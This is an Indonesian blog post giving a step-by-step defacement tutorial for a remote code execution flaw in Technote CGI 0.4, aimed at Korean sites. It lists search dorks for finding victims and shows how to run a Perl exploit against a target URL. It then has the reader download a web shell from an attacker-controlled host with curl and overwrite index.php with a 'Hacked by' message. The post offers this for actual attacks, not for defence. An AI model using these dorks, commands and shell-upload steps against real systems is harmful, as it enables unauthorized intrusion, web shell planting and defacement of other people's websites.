» » Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4

21:47
Bismillahirahmanirahim, Hallo sobat IT kali ini saya akan share exploit  Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 , sebelumnya thanks dulu buat tatsumi crew yang udah ngasih tutorial.
Langsung aja skuy lur..

++++++++++++++++++++++++++++++++++++++++++++++++++++
Dork : inurl:/technote/main.cgi
           inurl:/iboard.cgi site:kr (kembangin lagi )
Exploit : site.kr/[path]/main.cgi?board=FREE_BOARD
Tool : disini (perl file)
++++++++++++++++++++++++++++++++++++++++++++++++++++
Silahkan temen - temen cari targetnya dulu dah pake dork yang udah saya kasih ..
Jangan lupa save sourc tool yang udah saya share dengan extensi *pl , jika kalian pake linux pastikan terinstall dulu services perlnya, kalo yang pake windows bisa install Xampp kemudian simpan file di folder
  /xampp/perl/bin/  << 

kebetulan saya menggunakkan windows jadi saya pun memakai perl yang ada di xampp, selanjutnya buka CMD windows kalian , pastikan kalian berada dalam direktori /xampp/perl/bin , kalo dilinux kalian bisa langsung menjalankan. kemudian bisa langsung kalian jalankan exploitnya dengan memasukkan perintah:
cmd>perl exploit.pl http://target.kr/[path]/main.cgi?board=FREE_BOARD

Jika vuln maka akan seperti gambar diatas ini ^^^
kemudian kalian bisa test perintah perintah linux dulu untuk memastikan sudah terhubung dengan situs. seperti ls , uname -a , dsb.


Kemudian kalian coba cari cari dir yang bisa diupload file shell , untuk mengupload shell kalian . kalian paste dulu shell kalian di pastebin atau dimana saya yang penting shell kalian nantinya berbentuk text dulu terus kalian bisa gunakkan perintah:
curl http://situskalian.com/tes.txt --output shell.php
atau kalian bisa gunakan perintah yang kalian tahu silahkan, saya biasa menggunakan perintah ini.


 Jiksa shell kalian terupload maka akan seperti gambar diatas kalian bisa langsung cek shell kalian kalo begitu.

Jika tidak bisa upload file kalian bisa creat file saja dengan perintah
echo "Hacked by Peluru Kertas - Dx_Cyber">index.php
Silahkan kalian variasikan lagi karena tutorial dari saya terbatas.
Sekian tutorial yang bisa saya berikan mohon maaf bila ada kesalahan, semoga bermanfaat ilmunya
Wasallamualaikum

BAGIKAN:

Subscribe To Get Best Articles!

Jika menurut kalian artikel di blog ini berkualitas dan bermanfaat, silahkan berlangganan artikel terbaru melalui pesan masuk email anda secara gratis.

No comments:

Post a Comment

" Terimakasih telah mengunjungi blog kami ,, silahkan tinggalkan komentar untuk menghargai jerit payah penulis ^_^ "

Subscribe to: Post Comments ( Atom)